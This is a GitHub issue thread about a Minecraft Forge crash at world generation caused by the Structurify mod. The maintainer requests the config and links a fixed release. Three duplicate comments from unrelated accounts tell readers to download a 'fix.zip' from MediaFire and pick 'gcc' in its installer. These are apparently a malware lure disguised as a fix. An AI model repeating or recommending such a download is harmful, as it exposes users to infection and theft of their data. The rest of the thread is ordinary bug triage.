### ISSUE TITLE
Crashes upon world generation

### ISSUE THREAD

**Issue by YnwLNE** [Faboslav/structurify#2]
### Minecraft version information

1.20.1

### Mod loader information

Forge

### Mod loader version information

47.3.0

### Mod version information

1.0.0

### Expected Behavior

Mod should load up the world with settings (I had it 0.60 spacing)

### Actual Behavior

Closes and crashes the game upon world generation startup

### Reproduction Steps

1. install both mod and YACL
2. create a world
3. crashes 

### Screenshots & files

https://mclo.gs/tF8KzMe
[crash-2024-08-25_01.20.21-client.txt](https://github.com/user-attachments/files/16739287/crash-2024-08-25_01.20.21-client.txt)

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by YnwLNE** [comment]
> Can you provide your current `structurify.json` config file please? It seems like spacing and separation values are out of sync somehow, like in invalid range.

[structurify.json](https://github.com/user-attachments/files/16739658/structurify.json)


the structure sets are blank, idk if there's supposed to be anything there. In the mod config settings in game I can see all of the structures I have

**Comment by Faboslav** [comment]
Thanks, I will look at this later in the day, and i will try to release a fix as soon as possible.

**Comment by Faboslav** [comment]
> > Can you provide your current `structurify.json` config file please? It seems like spacing and separation values are out of sync somehow, like in invalid range.
> 
> [structurify.json](https://github.com/user-attachments/files/16739658/structurify.json)
> 
> the structure sets are blank, idk if there's supposed to be anything there. In the mod config settings in game I can see all of the structures I have

Is that really it? Since there is no change from default values.

**Comment by Faboslav** [comment]
Either way, i can probably put more safe measures into the code, to prevent this error.

**Comment by Faboslav** [comment]
Can you try it with this version of the mod please?:
[structurify-forge-mc1.20.1-1.0.1.jar.zip](https://github.com/user-attachments/files/16740428/structurify-forge-mc1.20.1-1.0.1.jar.zip)
(Dont forget to unzip the mod)

**Comment by YnwLNE** [comment]
> Can you try it with this version of the mod please?: [structurify-forge-mc1.20.1-1.0.1.jar.zip](https://github.com/user-attachments/files/16740428/structurify-forge-mc1.20.1-1.0.1.jar.zip) (Dont forget to unzip the mod)

Seemed to work for the most part but would randomly soft crash. I tried with 0.6, 1.0, and 1.5
[latest.log](https://github.com/user-attachments/files/16747170/latest.log)

**Comment by Faboslav** [comment]
Yeah, i think that other issues should not be related to this, please let me know if you know anything else, release with the fix will be out hopefully soon.

**Comment by Faboslav** [comment]
This should be completely fixed with https://github.com/Faboslav/structurify/releases/tag/mc1.20.1-1.0.1
